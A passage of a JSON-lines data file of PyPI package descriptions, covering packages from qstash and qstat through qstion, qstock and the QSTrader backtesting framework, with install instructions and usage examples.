a request to this URL# https://upstash.com/docs/qstash/features/callbacks\"callback\":\"https://my-api.com/callback\",# When message fails to send, send a request to this URL\"failure_callback\":\"https://my-api.com/failure_callback\",# Headers to forward to the endpoint\"headers\":{\"test-header\":\"test-value\",},# Enable content-based deduplication# https://upstash.com/docs/qstash/features/deduplication#content-based-deduplication\"content_based_deduplication\":True,})Additional methods are available for managing topics, schedules, and messages. See the examples folder for more.DevelopmentClone the repositoryInstallPoetryInstall dependencies withpoetry installCreate a .env file withcp .env.example .envand fill in theQSTASH_TOKENRun tests withpoetry run pytestand examples withpython3 examples/.pyFormat withpoetry run black ."} +{"package": "qstat", "pacakge-description": "The sungrid job submission framework known as`qsub`is a powerful tool to distribute your workload over many machines in parallel. To check the status of the jobs in the queue there is`qstat`which can print a human readable status table on the command line. Such status can be useful to keep track of your submitted compute jobs to e.g. prevent duplicate submission.This python qstat wrapper parses the jobs listed in`qstat-xml`into a list of dictionaries.Install with$ pip install qstatUsageGet python dictionaries descibing your`qsub`jobs.fromqstatimportqstatqueue_info,job_info=qstat()queue_info[13]{'@state':'running','JAT_prio':'0.55008','JAT_start_time':'2017-09-04T16:22:50','JB_job_number':'6384796','JB_name':'phs_obs_20120102_001','JB_owner':'relleums','queue_name':'test@isdc-cn11.astro.unige.ch','slots':'1','state':'r'}Add both`queue_info`and`job_info`to have one list of both running and waiting jobs:fromqstatimportqstatqueue_info,job_info=qstat()all_jobs=queue_info+job_infoforjobinall_jobs:print(job['JB_name'],'is',job['@state'])my_job_001 is running\nmy_job_002 is running\nmy_job_003 is runningor combine with e.g. with pandas DataFramefromqstatimportqstatq,j=qstat()importpandasaspddf=pd.DataFrame(q+j)df.tail()@state JAT_prio JAT_start_time JB_job_number JB_name \\\n190 pending 0.00000 NaN 6384973 phs_obs_20160102_002\n191 pending 0.00000 NaN 6384974 phs_obs_20160201_001\n192 pending 0.00000 NaN 6384975 phs_obs_20160201_002\n193 pending 0.00000 NaN 6384976 phs_obs_20160202_001\n194 pending 0.00000 NaN 6384977 phs_obs_20160202_002\n\n JB_owner JB_submission_time queue_name slots state\n190 relleums 2017-09-04T16:22:51 None 1 qw\n191 relleums 2017-09-04T16:22:51 None 1 qw\n192 relleums 2017-09-04T16:22:51 None 1 qw\n193 relleums 2017-09-04T16:22:51 None 1 qw\n194 relleums 2017-09-04T16:22:51 None 1 qw"} +{"package": "qstatistic", "pacakge-description": "==========qstatistic==========.. image:: https://img.shields.io/pypi/v/qstatistic.svg:target: https://pypi.python.org/pypi/qstatistic.. image:: https://img.shields.io/travis/yan-duarte/qstatistic.svg:target: https://travis-ci.org/yan-duarte/qstatistic.. image:: https://readthedocs.org/projects/qstatistic/badge/?version=latest:target: https://qstatistic.readthedocs.io/en/latest/?badge=latest:alt: Documentation Status.. image:: https://pyup.io/repos/github/yan-duarte/qstatistic/shield.svg:target: https://pyup.io/repos/github/yan-duarte/qstatistic/:alt: UpdatesPython Boilerplate contains all the boilerplate you need to create a Python package.* Free software: GNU General Public License v3* Documentation: https://qstatistic.readthedocs.io.Features--------* TODOCredits---------This package was created with Cookiecutter_ and the `audreyr/cookiecutter-pypackage`_ project template... _Cookiecutter: https://github.com/audreyr/cookiecutter.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage=======History=======0.1.0.2 (2017-09-03)------------------* qSigmoid now accept a numpy array as input.* Made some tests for qSigmoid.0.1.0.1 (2017-08-31)------------------* First release on PyPI."} +{"package": "qstats", "pacakge-description": "qstatsQuery SGE batch job information"} +{"package": "q-stdev", "pacakge-description": "No description available on PyPI."} +{"package": "qstem-ase", "pacakge-description": "UNKNOWN"} +{"package": "qstest", "pacakge-description": "Python codes for the (q, s)-test, a significance test for individual communities in networks.Please citeKojaku, S. and Masuda, N. \"A generalised significance test for individual communities in networks\". Preprint arXiv: 1712.00298 (2017)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014ContentsLICENSE - License of qstestREADME.md - README file for GithubREADME.txt - This README filesetup.py - Script for installing qstestrequirements.txt - List of libraries installed by setup.pytest.py - Test code for Travis CI.gitignore - Configuration file for GitHub.travis.yml - Configuration file for Travis CIqstest/ - Python codes for the (q, s)-test:qstest/__init__.py - Header fileqstest/cdalgorithm_wrapper.py - Codes for community-detection algorithmsqstest/qstest.py contains - Codes for the (q, s)-testqstest/quality_functions.py - Codes for calculating quality functions of a communityqstest/size_functions.py - Codes for calculating the size of a communityexamples/ - example codes:examples/example1.py - Usage of qstest with a built-in quality function, community-size function and community detection algorithmexamples/example2.py - Usage of qstest with a user-defined quality functionexamples/example3.py - Usage of qstest with a user-defined community-size functionexamples/example4.py - Usage of qstest with a user-defined community-detection algorithm\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014InstallationYou can install qstest with pip, a package management system for Python.To install, runpip install qstestIf this does not work, trypython setup.py install\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014Usagesg, p_values = qstest(network, communities, qfunc, sfunc, cdalgorithm, num_of_rand_net = 500, alpha = 0.05, num_of_thread = 4)Inputnetwork - Networkx Graph class instancecommunities - C-dimensional list of lists. communities[c] is a list containing the IDs of nodes belonging to community c. Node and community indices start from 0.qfunc - Quality of a community. The following quality functions are available:qmod - Contribution of a community to the modularityqint - Internal average degreeqexp - Expansionqcnd - ConductanceTo pass your quality function to qstest, see \"How to pass your quality function to qstest\" below.sfunc - Community-size function (i.e., size of a community). The following community-size functions are available:n - Number of nodes in a communityvol - Sum of the degrees of nodes in a communityTo pass your community-size function to qstest, see \"How to pass your community-size function to qstest\" below.cdalgorithm - Community-detection algorithm. The following algorithms are available:louvain - Louvain algorithm (http://perso.crans.org/aynaud/communities/index.html)label_propagation - Label propagation algorithm (https://networkx.github.io/documentation/stable/reference/algorithms/community.html)To pass your community-detection algorithm to qstest, see \"How to pass your community-detection algorithm to qstest\" below.num_of_rand_net (optional) - Number of randomised networks (Default: 500)alpha (optional) - Statistical significance level before the \u0160id\u00e1k correction (Default: 0.05)num_of_thread (optional) - Maximum number of CPU threads (Default: 4)Outputsg - Results of the significance test (C-dimensional list). sg[c] = True or False indicates that community c is significant or insignificant, respectively.p_values - P-values for the communities (C-dimensional list). p_values[c] is the p-value for community c.Example (examples/example1.py)import networkx as nximport qstest as qsnetwork = nx.karate_club_graph()communities = qs.louvain(network)sg, p_values = qs.qstest(network, communities, qs.qmod, qs.vol, qs.louvain)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014How to pass your quality function to qstestWrite a quality function of a community as follows:q = my_qfunc(network, community)Inputnetwork - Networkx Graph class instancecommunity - List of nodes belonging to a communityOutputq - Quality of the communityThen, pass my_qfunc to qstest:sg, p_values = qstest(network, communities, my_qfunc, sfunc, cdalgorithm)Example (examples/example2.py)import networkx as nximport qstest as qs# Number of intra-community edgesdef my_qfunc(network, nodes):return network.subgraph(nodes).size()network = nx.karate_club_graph()communities = qs.louvain(network)sg, p_values = qs.qstest(network, communities, my_qfunc, qs.vol, qs.louvain)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014How to pass your community-size function to qstestWrite a community-size function of a community as follows:s = my_sfunc(network, community)Inputnetwork - Networkx Graph class instancecommunity - List of the IDs of nodes belonging to a communityOutputs - Size of the communityThen, pass my_sfunc to qstest:sg, p_values = qstest(network, communities, qfunc, my_sfunc, cdalgorithm)Example (examples/example3.py)import networkx as nximport qstest as qs# Square of the number of nodes in a communitydef my_sfunc(network, nodes):return len(nodes) * len(nodes)network = nx.karate_club_graph()communities = qs.louvain(network)sg, p_values = qs.qstest(network, communities, qs.qmod, my_sfunc, qs.louvain)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014How to pass your community-detection algorithm to qstestTo pass your community-detection algorithm to qstest, write a wrapper function of the following form:communities = my_cdalgorithm(network)Inputnetwork - Networkx Graph class instanceOutputcommunities - C-dimensional list of lists. communities[c] is a list containing the IDs of nodes belonging to community c.Then, pass my_cdalgorithm to qstest:sg, p_values = qstest(network, communities, qfunc, sfunc, my_cdalgorithm)If the community-detection algorithm requires parameters such as the number of communities, then pass the parameters as global variables, e.g., define a global variable X, then use X within the cdalgorithm.Example (examples/example4.py)import networkx as nximport qstest as qsfrom networkx.algorithms import community as nxcdalgorithm# Wrapper function for async_fluidc implemented in Networkx 2.0def my_cdalgorithm(network):communities = []subnets = nx.connected_component_subgraphs(network)for subnet in subnets:coms_iter = nxcdalgorithm.asyn_fluidc(subnet, min([C, subnet.order()]), maxiter)for nodes in iter(coms_iter):communities.append(list(nodes))return communities# Pareameters of async_fluidcC = 3maxiter = 10network = nx.karate_club_graph()communities = my_cdalgorithm(network)sg, p_values = qs.qstest(network, communities, qs.qmod, qs.vol, my_cdalgorithm)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014RequirementsPython 2.7, 3.4 or laterSciPy 1.0 or laterNetworkx 2.0 or laterpython-louvain 0.9\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014Last updated: 29 November 2017"} +{"package": "qstion", "pacakge-description": "qstionA querystring parsing and stringifying library with some added security.\nLibrary was based onthisjs library.Usageimportqstionasqsx=qs.parse('a=c')assertx=={'a':'c'}x_str=qs.stringify(x)assertx_str=='a=c'Parsing stringsqstion(as well asqsin js) allows you to parse string into nested objects.importqstionasqsassertqs.parse('a[b][c]=1')=={'a':{'b':{'c':'1'}}}There is no support for plain object options or prototype pollution.Uri encoded strings are supportedimportqstionasqsassertqs.parse('a%5Bb%5D=c')=={'a':{'b':'c'}}Following options are supported:from_url:bool- ifTruethenparsewill parse querystring from url usingurlparsefromurllib.parsemodule, default:Falseimportqstionasqsassertqs.parse('http://localhost:8080/?a=c',from_url=True)=={'a':'c'}assertqs.parse('a=c',from_url=False)=={'a':'c'}delimiter:str|re.Pattern- delimiter for parsing, default:&importqstionasqsassertqs.parse('a=c&b=d',delimiter='&')=={'a':'c','b':'d'}assertqs.parse('a=c;b=d,c=d',delimiter='[;,]')=={'a':'c','b':'d','c':'d'}depth:int- maximum depth for parsing, default:5importqstionasqsassertqs.parse('a[b][c][d][e][f][g][h][i]=j',depth=5)=={'a':{'b':{'c':{'d':{'e':{'f':{'[g][h][i]':'j'}}}}}}}assertqs.parse('a[b][c][d][e][f][g][h][i]=j',depth=1)=={'a':{'b':{'[c][d][e][f][g][h][i]':'j'}}}parameter_limit:int- maximum number of parameters to parse, default:1000importqstionasqsassertqs.parse('a=b&c=d&e=f&g=h&i=j&k=l&m=n&o=p&q=r&s=t&u=v&w=x&y=z',parameter_limit=5)=={'a':'b','c':'d','e':'f','g':'h','i':'j'}allow_dots:bool- ifTruethen dots in keys will be parsed as nested objects, default:Falseimportqstionasqsassertqs.parse('a.b=c',allow_dots=True)=={'a':{'b':'c'}}parse_arrays:bool- ifTruethen arrays will be parsed, default:Falseimportqstionasqsassertqs.parse('a[]=b&a[]=c',parse_arrays=True)=={'a':{0:'b',1:'c'}}assertqs.parse('a[0]=b&a[1]=c',parse_arrays=False)=={'a':{'0':'b','1':'c'}}array_limit:int- maximum number of elements in array to keep array notation (only used with combination of argumentparse_arrays), default:20importqstionasqsassertqs.parse('a[]=b&a[]=c&',parse_arrays=True)=={'a':{0:'b',1:'c'}}assertqs.parse('a[0]=b&a[1]=c&',array_limit=1,parse_arrays=True)=={'a':{'0':'b','1':'c'}}allow_empty:bool- ifTruethen empty values and keys are accepted, default:Falseimportqstionasqsassertqs.parse('a=&b=',allow_empty=True)=={'a':'','b':''}assertqs.parse('a[]=&b[]=',allow_empty=True)=={'a':{'':''},'b':{'':''}}charset:str- charset to use when decoding uri encoded strings, default:utf-8importqstionasqsassertqs.parse('a=%A7',charset='iso-8859-1')=={'a':'\u00a7'}assertqs.parse('a=%C2%A7',charset='utf-8')=={'a':'\u00a7'}charset_sentinel:bool- ifTruethen, ifutf8=\u2713arg is included in querystring, then charset will be deduced based on encoding of '\u2713' character (recognizes onlyutf8andiso-8859-1), default:Falseimportqstionasqsassertqs.parse('a=%C2%A7&utf8=%E2%9C%93',charset='iso-8859-1',charset_sentinel=True)=={'a':'\u00a7'}assertqs.parse('a=%A7&utf8=%26%2310003',charset='utf-8',charset_sentinel=True)=={'a':'\u00a7'}interpret_numeric_entities:bool- ifTruethen numeric entities will be interpreted as unicode characters, default:Falseimportqstionasqsassertqs.parse('a=%26%2310003',charset='iso-8859-1',interpret_numeric_entities=True)=={'a':'\u2713'}parse_primitive:bool- ifTruethen primitive values will be parsed in their appearing types, default:Falseimportqstionasqsassertqs.parse('a=1&b=2&c=3',parse_primitive=True)=={'a':1,'b':2,'c':3}assertqs.parse('a=true&b=false&c=null',parse_primitive=True)=={'a':True,'b':False,'c':None}primitive_strict:bool- ifTruethen primitive values ofboolandNoneTypewill be parsed to reserved strict keywords (used only ifparse_primitiveisTrue), default:Trueimportqstionasqsassertqs.parse('a=true&b=false&c=null&d=None',parse_primitive=True,primitive_strict=True)=={'a':True,'b':False,'c':None,'d':'None'}assertqs.parse('a=True&b=False&c=NULL',parse_primitive=True,primitive_strict=True)=={'a':'True','b':'False','c':'NULL'}assertqs.parse('a=True&b=False&c=NULL',parse_primitive=True,primitive_strict=False)=={'a':True,'b':False,'c':None}comma:bool- ifTrue, then coma separated values will be parsed as multiple separate values instead of string, default:Falseimportqstionasqsassertqs.parse('a=1,2,3',comma=True,parse_primitive=True)=={'a':[1,2,3]}Stringifying objectsqstion(as well asqsin js) allows you to stringify objects into querystring.importqstionasqsassertqs.stringify({'a':'b'})=='a=b'Following options are supported:allow_dots:bool- ifTruethen nested keys will be stringified using dot notation instead of brackets, default:Falseimportqstionasqsassertqs.stringify({'a':{'b':'c'}},allow_dots=True)=='a.b=c'encode:bool- ifTruethen keys and values will be uri encoded (with defaultcharset), default:Trueimportqstionasqsassertqs.stringify({'a[b]':'b'},encode=False)=='a[b]=b'assertqs.stringify({'a[b]':'b'},encode=True)=='a%5Bb%5D=b'charset:str- charset to use when encoding uri strings, default:utf-8(ifencodeisTrue), note that un-encodable characters will be encoded using their xml numeric entitiesimportqstionasqsassertqs.stringify({'a':'\u00a7'},charset='iso-8859-1')=='a=%A7'assertqs.stringify({'a':'\u263a'},charset='iso-8859-1')=='a=%26%2312850'charset_sentinel:bool- ifTruethen,utf8=\u2713will be added to querystring to indicate that charset based on encoding of '\u2713' character (recognizes onlyutf8andiso-8859-1), default:Falseimportqstionasqsassertqs.stringify({'a':'\u00a7'},charset='iso-8859-1',charset_sentinel=True)=='a=%A7&utf8=%E2%9C%93'delimiter:str- delimiter for stringifying, default:&importqstionasqsassertqs.stringify({'a':'b','c':'d'},delimiter='&')=='a=b&c=d'assertqs.stringify({'a':'b','c':'d'},delimiter=';')=='a=b;c=d'encode_values_only:bool- ifTruethen only values will be encoded, default:False(this option is overridden whenencodeisTrue)importqstionasqsassertqs.stringify({'a':{'b':'\u263a'}},encode_values_only=True,charset='iso-8859-1')=='a[b]=%26%2312850'array_format:str- format for array notation, options: 'brackets','indices', 'repeat', 'comma', default: 'indices'importqstionasqsassertqs.stringify({'a':{1:'b',2:'c'}},array_format='brackets')=='a[]=b&a[]=c'assertqs.stringify({'a':{1:'b',2:'c'}},array_format='indices')=='a[1]=b&a[2]=c'assertqs.stringify({'a':{1:'b',2:'c'}},array_format='repeat')=='a=b&a=c'assertqs.stringify({'a':{1:'b',2:'c'}},array_format='comma')=='a=b,c'sort:bool- ifTruethen keys will be sorted alphabetically, default:Falseimportqstionasqsassertqs.stringify({'x':'y','a':'b'},sort=True)=='a=b&x=y'sort_reverse:bool- ifTruethen keys will be sorted (ifsortisTrue) in reverse order, default:Falseimportqstionasqsassertqs.stringify({'x':'y','a':'b'},sort=True,sort_reverse=True)=='x=y&a=b'filter:list[str]- list of keys to filter, default:Noneimportqstionasqsassertqs.stringify({'a':'b','c':'d'},filter=['a'])=='a=b'"} +{"package": "qstock", "pacakge-description": "qstock\u7531\u201cPython\u91d1\u878d\u91cf\u5316\u201d\u516c\u4f17\u53f7\u5f00\u53d1\uff0c\u8bd5\u56fe\u6253\u9020\u6210\u4e2a\u4eba\u91cf\u5316\u6295\u7814\u5206\u6790\u5f00\u6e90\u5e93\uff0c\u76ee\u524d\u5305\u62ec\u6570\u636e\u83b7\u53d6\uff08data\uff09\u3001\u53ef\u89c6\u5316(plot)\u3001\u9009\u80a1(stock)\u548c\u91cf\u5316\u56de\u6d4b\uff08backtest\uff09\u56db\u4e2a\u6a21\u5757\u3002\u5176\u4e2d\u6570\u636e\u6a21\u5757\uff08data\uff09\u6570\u636e\u6765\u6e90\u4e8e\u4e1c\u65b9\u8d22\u5bcc\u7f51\u3001\u540c\u82b1\u987a\u3001\u65b0\u6d6a\u8d22\u7ecf\u7b49\u7f51\u4e0a\u516c\u5f00\u6570\u636e\uff0c\u6570\u636e\u722c\u866b\u90e8\u5206\u53c2\u8003\u4e86\u73b0\u6709\u91d1\u878d\u6570\u636e\u5305tushare\u3001akshare\u548cefinance\u3002qstock\u81f4\u529b\u4e8e\u4e3a\u7528\u6237\u63d0\u4f9b\u66f4\u52a0\u7b80\u6d01\u548c\u89c4\u6574\u5316\u7684\u91d1\u878d\u5e02\u573a\u6570\u636e\u63a5\u53e3\u3002\u53ef\u89c6\u5316\u6a21\u5757\u57fa\u4e8eplotly.express\u548cpyecharts\u5305\uff0c\u4e3a\u7528\u6237\u63d0\u4f9b\u57fa\u4e8eweb\u7684\u4ea4\u4e92\u56fe\u5f62\u7b80\u5355\u64cd\u4f5c\u63a5\u53e3\uff1b\u9009\u80a1\u6a21\u5757\u63d0\u4f9b\u4e86\u540c\u82b1\u987a\u7684\u6280\u672f\u9009\u80a1\u548c\u516c\u4f17\u53f7\u7b56\u7565\u9009\u80a1\uff0c\u5305\u62ecRPS\u3001MM\u8d8b\u52bf\u3001\u8d22\u52a1\u6307\u6807\u3001\u8d44\u91d1\u6d41\u6a21\u578b\u7b49\uff0c\u56de\u6d4b\u6a21\u5757\u4e3a\u5927\u5bb6\u63d0\u4f9b\u5411\u91cf\u5316\uff08\u57fa\u4e8epandas\uff09\u548c\u57fa\u4e8e\u4e8b\u4ef6\u9a71\u52a8\u7684\u57fa\u672c\u6846\u67b6\u548c\u6a21\u578b\u3002\nqstock\u76ee\u524d\u5728pypi\u5b98\u7f51\u4e0a\u53d1\u5e03\uff0c\u5f00\u6e90\u7b2c\u4e00\u7248\u672c\u4e3a1.1.0\uff0c\u76ee\u524d\u66f4\u65b0\u81f31.3.4.\u8bfb\u8005\u76f4\u63a5\u201cpip install qstock \u201d\u5b89\u88c5\uff0c\u6216\u901a\u8fc7\u2019pip install \u2013upgrade qstock\u2019\u8fdb\u884c\u66f4\u65b0\u3002GitHub\u5730\u5740\uff1ahttps://github.com/tkfy920/qstock\u3002\u76ee\u524d\u90e8\u5206\u7b56\u7565\u9009\u80a1\u548c\u7b56\u7565\u56de\u6d4b\u529f\u80fd\u4ec5\u4f9b\u77e5\u8bc6\u661f\u7403\u4f1a\u5458\u4f7f\u7528\uff0c\u4f1a\u5458\u53ef\u5728\u77e5\u8bc6\u661f\u7403\u7f6e\u9876\u5e16\u5b50\u4e0a\u4e0a\u83b7\u53d6qstock\u79bb\u7ebf\u5b89\u88c5\u5305\u3002\u76f8\u5173\u6559\u7a0b\uff1a\u3010qstock\u5f00\u6e90\u4e86\u3011\u6570\u636e\u7bc7\u4e4b\u884c\u60c5\u4ea4\u6613\u6570\u636e(https://mp.weixin.qq.com/s/p1lEsBVhrm5ej3YZl0BhOw)\n\u3010qstock\u6570\u636e\u7bc7\u3011\u884c\u4e1a\u6982\u5ff5\u677f\u5757\u4e0e\u8d44\u91d1\u6d41(https://mp.weixin.qq.com/s/hj4yuqFDBidAeSRucz6TwQ)\n\u3010qstock\u91cf\u5316\u3011\u6570\u636e\u7bc7\u4e4b\u80a1\u7968\u57fa\u672c\u9762\u6570\u636e(https://mp.weixin.qq.com/s/XznS8hFMEa47x1IElZXJaA)\n\u3010qstock\u91cf\u5316\u3011\u6570\u636e\u7bc7\u4e4b\u5b8f\u89c2\u6307\u6807\u548c\u8d22\u7ecf\u65b0\u95fb\u6587\u672c(https://mp.weixin.qq.com/s/vq7BJUCdHMkcgJYjsErpYQ)\n\u3010qstock\u91cf\u5316\u3011\u52a8\u6001\u4ea4\u4e92\u6570\u636e\u53ef\u89c6\u5316(https://mp.weixin.qq.com/s/zmY4gsPDQ6xDDpC-fVBUPg)\u66f4\u591a\u5e72\u8d27\u8bf7\u5173\u6ce8\u5fae\u4fe1\u516c\u4f17\u53f7\uff1aPython\u91d1\u878d\u91cf\u5316"} +{"package": "qstr", "pacakge-description": "qstr: convert Python objects to a KDB+q stringUsage Example:import datetime as dt\nfrom qstr import qstr\nqstr(\"Hello\", 3., [3., dt.date(2000, 1, 1)], [], {\"A\": 3, \"B\": 4})"} +{"package": "qstrader", "pacakge-description": "QSTraderDevelopmentDetailsTest StatusVersion InfoCompatibilityLicenseQSTrader is a free Python-based open-source modular schedule-driven backtesting framework for long-short equities and ETF based systematic trading strategies.QSTrader can be best described as a loosely-coupled collection of modules for carrying out end-to-end backtests with realistic trading mechanics.The default modules provide useful functionality for certain types of systematic trading strategies and can be utilised without modification. However the intent of QSTrader is for the users to extend, inherit or fully replace each module in order to provide custom functionality for their own use case.The software is currently under active development and is provided under a permissive \"MIT\" license.Previous Version and Advanced Algorithmic TradingPlease note that the previous version of QSTrader, which is utilised through theAdvanced Algorithmic Tradingebook, can be found along with the appropriate installation instructionshere.It has recently been updated to support Python 3.9, 3.10, 3.11 and 3.12 with up to date package dependencies.InstallationInstallation requires a Python3 environment. The simplest approach is to download a self-contained scientific Python distribution such as theAnaconda Individual Edition. You can then install QSTrader into an isolatedvirtual environmentusing pip as shown below.Any issues with installation should be reported to the development team as issueshere.condacondais a command-line tool that comes with the Anaconda distribution. It allows you to manage virtual environments as well as packagesusing the same tool.The following command will create a brand new environment calledbacktest.conda create -n backtest pythonThis will use the conda default Python version. At time of writing this was Python 3.12. QSTrader currently supports Python 3.9, 3.10, 3.11 and 3.12. Optionally you can specify a python version by substituting python==3.9 into the command as follows:conda create -n backtest python==3.9In order to start using QSTrader, you need to activate this new environment and install QSTrader using pip.conda activate backtest\npip3 install qstraderpipAlternatively, you can usevenvto handle the environment creation andpipto handle the package installation.python -m venv backtest\nsource backtest/bin/activate # Need to activate environment before installing package\npip3 install qstraderFull DocumentationComprehensive documentation and beginner tutorials for QSTrader can be found on QuantStart.com athttps://www.quantstart.com/qstrader/.QuickstartThe QSTrader repository provides some simple example strategies at/examples.Within this quickstart section a classic 60/40 equities/bonds portfolio will be backtested with monthly rebalancing on the last day of the calendar month.To get started download thesixty_forty.pyfile and place into the directory of your choice.The 60/40 script makes use of OHLC 'daily bar' data from Yahoo Finance. In particular it requires theSPYandAGGETFs data. Download the full history for each and save as CSV files in same directory assixty_forty.py.Assuming that an appropriate Python environment exists and QSTrader has been installed (seeInstallationabove), make sure to activate the virtual environment, navigate to the directory withsixty_forty.pyand type:python sixty_forty.pyYou will then see some console output as the backtest simulation engine runs through each day and carries out the rebalancing logic once per month. Once the backtest is complete a tearsheet will appear:You can examine the commentedsixty_forty.pyfile to see the current QSTrader backtesting API.If you have any questions about the installation or example usage then please feel free to emailsupport@quantstart.comor raise an issuehere.Current FeaturesBacktesting Engine- QSTrader employs a schedule-based portfolio construction approach to systematic trading. Signal generation is decoupled from portfolio construction, risk management, execution and simulated brokerage accounting in a modular, object-oriented fashion.Performance Statistics- QSTrader provides typical 'tearsheet' performance assessment of strategies. It also supports statistics export via JSON to allow external software to consume metrics from backtests.Free Open-Source Software- QSTrader has been released under a permissive open-source MIT License. This allows full usage in both research and commercial applications, without restriction, but with no warranty of any kind whatsoever (seeLicensebelow). QSTrader is completely free and costs nothing to download or use.Software Development- QSTrader is written in the Python programming language for straightforward cross-platform support. QSTrader contains a suite of unit and integration tests for the majority of its modules. Tests are continually added for new features.License TermsCopyright (c) 2015-2024 QuantStart.com, QuarkGluon LtdPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.Trading DisclaimerTrading equities on margin carries a high level of risk, and may not be suitable for all investors. Past performance is not indicative of future results. The high degree of leverage can work against you as well as for you. Before deciding to invest in equities you should carefully consider your investment objectives, level of experience, and risk appetite. The possibility exists that you could sustain a loss of some or all of your initial investment and therefore you should not invest money that you cannot afford to lose. You should be aware of all the risks associated with equities trading, and seek advice from an independent financial advisor if you have any doubts."} +{"package": "qstrbuilder", "pacakge-description": "qstrbuilder: convert Python objects to a KDB+q stringUsage Example:import datetime as dt\nfrom qstrbuilder import build\nbuild(\"Hello\", 3., [3., dt.date(2000, 